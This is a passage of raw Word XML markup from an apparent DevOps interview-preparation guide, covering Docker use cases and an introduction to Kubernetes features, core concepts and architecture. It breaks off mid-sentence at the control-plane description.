      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run PostgreSQL locally</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without installing it → use a Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30996DF3" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You need to test your app on </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Node.js 14 and 18</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → spin up containers with different versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091BD5B4" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deploy a Java Spring Boot app</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Redis and MySQL in production → use Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4538B0" w14:textId="78D4F0AB" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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lastRenderedPageBreak/>
        <w:pict w14:anchorId="0B814230">
          <v:rect id="_x0000_i3401" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="006C0B8D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF5944" w14:textId="79EF40F7" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="842" w:name="_Toc196308322"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="842"/>
    </w:p>
    <w:p w14:paraId="456E56D9" w14:textId="45FCCE43" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="001854F1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="843" w:name="_Toc196308323"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="843"/>
    </w:p>
    <w:p w14:paraId="5339830B" w14:textId="02AD8443" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0" w:rsidP="009D1D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kubernetes (K8s)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source container orchestration platform</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automate the deployment, scaling, and management of containerized applications</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065200D" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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3E4F29C">
          <v:rect id="_x0000_i3402" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B7182" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Features of Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E5973" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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1. Container Orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A66B9"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Manages containers (like Docker) at </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041387CD"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Handles scheduling, lifecycle, networking, and storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D669C" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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2. Self-Healing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40667624"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Restarts failed containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF2C81"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Replaces and reschedules containers when nodes die.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB1A24"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Kills containers that don't respond to health checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156C9A5" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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3. Load Balancing &amp; Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39828E5E"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Exposes a container using a DNS name or IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C744D"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Distributes network traffic to maintain stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26AB1A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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4. Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7EEB51"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Automatically scales containers up/down based on CPU or custom metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431691C4" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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5. Rolling Updates and Rollbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2D21C"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Updates applications with </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zero downtime</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA36812"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Rolls back to previous versions if something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC4397" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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6. Storage Orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19FBE0"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Mounts storage systems like AWS EBS, GCP Persistent Disk, NFS, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0C2AD" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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7. Configuration Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13993BE5"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Uses ConfigMaps and Secrets to manage environment variables and credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B79E2" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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13C05F2">
          <v:rect id="_x0000_i3403" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FCE0E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Basic Concep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4"/>
        <w:gridCol w:w="5182"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="0A16A7B2" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30B0F223" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Kubernetes Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F45F6B8" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="14FE9A54" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="222C09A5"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Pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E7AB857"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Smallest unit in K8s. Can contain one or more containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="66CB7B34" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06734F40"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Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B40FB6"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A machine (VM or physical) that runs pods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="6966321B" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27425BAD"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Cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C3B0E6"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Group of nodes managed by Kubernetes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="49B28135" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="109D2BC0"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Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A4147A"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Manages replica sets and updates for pods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="6CE15B99" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6013B5E1"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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F355A98"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Exposes a set of pods as a network service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="0F1993C6" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C83E975"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Ingress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9FDE23"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Manages external access to services (HTTP/HTTPS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6346C91A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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6BCBC06">
          <v:rect id="_x0000_i3404" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DD0CC" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A600099"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You have a </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices app</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003A2EE"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Frontend (Angular)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E6AE3"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Backend (Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A76BFE"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Database (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6CDD6"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Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E734710"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Kubernetes helps you deploy, manage, scale, and monitor all of them efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879EA49" w14:textId="2D2F74D3" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BF7CA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81DE036">
          <v:rect id="_x0000_i3405" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18FB3E" w14:textId="6BD485A5" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF7CA0" w:rsidP="00BF7CA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="844" w:name="_Toc196308324"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kubernetes Architecture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="844"/>
    </w:p>
    <w:p w14:paraId="779372ED" w14:textId="3B33A009" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0" w:rsidP="009D1D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kubernetes Architecture Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACEDB3"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Kubernetes is a distributed system that allows you to orchestrate, deploy, scale, and manage containerized applications. Its architecture is designed to be flexible, resilient, and scalable. Here's a breakdown of its components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27D2C0" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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6ECFA0C">
          <v:rect id="_x0000_i3406" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD1127" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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1. Master Node (Control Plane)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317D351"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
